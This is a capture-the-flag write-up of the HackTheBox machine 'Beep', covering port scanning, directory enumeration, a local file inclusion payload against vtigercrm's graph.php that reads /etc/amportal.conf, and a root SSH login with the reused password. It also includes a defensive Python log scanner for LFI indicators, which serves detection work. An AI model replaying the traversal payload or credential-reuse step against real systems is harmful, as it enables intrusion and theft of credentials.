[HackTheBox] Beep

Beep is an easy machine that requires only basic enumeration knowledge to complete. Root is obtained by exploiting a simple LFI vulnerability, which makes the box interesting while keeping it simple.

Summary

  • Website reveals an Elastix installation.
  • Enumerate the website to find vtigercrm directory.
  • Exploit LFI in graph.php file to get the password.
  • Log in as root over SSH using the password found there.

Recon

Port Scan

nmap -n -sV -p- -T 5 -Pn 10.10.10.7

PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open     smtp       Postfix smtpd
80/tcp    open     http       Apache httpd 2.2.3
110/tcp   open     pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open     rpcbind    2 (RPC #100000)
143/tcp   open     imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open     ssl/https?
878/tcp   open     status     1 (RPC #100024)
993/tcp   open     ssl/imap   Cyrus imapd
995/tcp   open     pop3       Cyrus pop3d
3306/tcp  open     mysql      MySQL (unauthorized)
4190/tcp  open     sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open     upnotifyp?
4559/tcp  open     hylafax    HylaFAX 4.3.10
5038/tcp  open     asterisk   Asterisk Call Manager 1.1
10000/tcp open     http       MiniServ 1.570 (Webmin httpd)

HTTP (Port 80)

When we go to https://10.10.10.7/, we are presented with an Elastix login page. There are multiple public exploits for Elastix, and I needed to enumerate a bit more to find out which one applies.

Quick directory enumeration revealed the vtigercrm directory.

ffuf -w /usr/share/dirb/wordlists/big.txt -fc 403,404 -u https://10.10.10.7/FUZZ

admin                   [Status: 301, Size: 309, Words: 20, Lines: 10]
configs                 [Status: 301, Size: 311, Words: 20, Lines: 10]
favicon.ico             [Status: 200, Size: 879, Words: 6, Lines: 1]
help                    [Status: 301, Size: 308, Words: 20, Lines: 10]
images                  [Status: 301, Size: 310, Words: 20, Lines: 10]
lang                    [Status: 301, Size: 308, Words: 20, Lines: 10]
libs                    [Status: 301, Size: 308, Words: 20, Lines: 10]
mail                    [Status: 301, Size: 308, Words: 20, Lines: 10]
modules                 [Status: 301, Size: 311, Words: 20, Lines: 10]
panel                   [Status: 301, Size: 309, Words: 20, Lines: 10]
recordings              [Status: 301, Size: 314, Words: 20, Lines: 10]
robots.txt              [Status: 200, Size: 28, Words: 3, Lines: 3]
static                  [Status: 301, Size: 310, Words: 20, Lines: 10]
themes                  [Status: 301, Size: 310, Words: 20, Lines: 10]
var                     [Status: 301, Size: 307, Words: 20, Lines: 10]
vtigercrm               [Status: 301, Size: 313, Words: 20, Lines: 10]

Exploit

The exploit used here targets a local file inclusion vulnerability in the graph.php file located in this directory.

Quick proof of concept:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

The config file retrieved with this exploit contains many credentials. Wherever a password was set, the default one was commented out and replaced with a new one. The problem is… THEY ARE ALL THE SAME!
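From the defender's side, the request above leaves a very recognisable trace in the web server's access log: a traversal sequence, a null byte and an absolute path inside a single query parameter. The following script is an added example, not part of the original writeup or of Elastix; it parses constructed Apache combined-format log lines and flags requests carrying those LFI indicators, decoding values more than once so double-encoded variants are caught too.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (not real traffic). The second line mirrors the
# graph.php request from the writeup; the last one is a different LFI probe
# that was blocked with a 404, to show that the response code is reported too.
SAMPLE_LOG = """\
10.10.14.2 - - [10/Mar/2024:12:00:01 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 512
10.10.14.2 - - [10/Mar/2024:12:00:05 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 4096
10.10.14.3 - - [10/Mar/2024:12:00:09 +0000] "GET /admin/ HTTP/1.1" 301 309
10.10.14.4 - - [10/Mar/2024:12:00:12 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 280
"""

# Minimal parser for the Apache combined/common log format: client IP,
# timestamp, request line and status code are all we need here.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def lfi_indicators(target):
    """Return the sorted list of LFI indicators found in a request target."""
    found = set()
    parts = urlsplit(target)
    # Check the path as well as every query value (blank values kept, since
    # the writeup's request ends in a bare "&action").
    values = [parts.path]
    for vals in parse_qs(parts.query, keep_blank_values=True).values():
        values.extend(vals)
    for raw in values:
        # parse_qs already decoded once; decoding again catches %252e-style
        # double encoding that a naive string match would miss.
        decoded = unquote(unquote(raw))
        if "../" in decoded or "..\\" in decoded:
            found.add("traversal")
        if "\x00" in decoded:
            found.add("null-byte")
        if re.search(r"(^|[^A-Za-z0-9])/etc/", decoded):
            found.add("absolute-path")
    return sorted(found)


def scan_log(text):
    """Return (ip, status, target, indicators) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        indicators = lfi_indicators(m["target"])
        if indicators:
            hits.append((m["ip"], int(m["status"]), m["target"], indicators))
    return hits
```

A 200 response to a flagged request, as in the second sample line, is the case worth escalating: it means the server most likely served the included file.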

Privilege Escalation

After a bit of trial and error, I found out that the new password (from the config file) just worked while trying to log in as root through SSH.

ssh root@10.10.10.7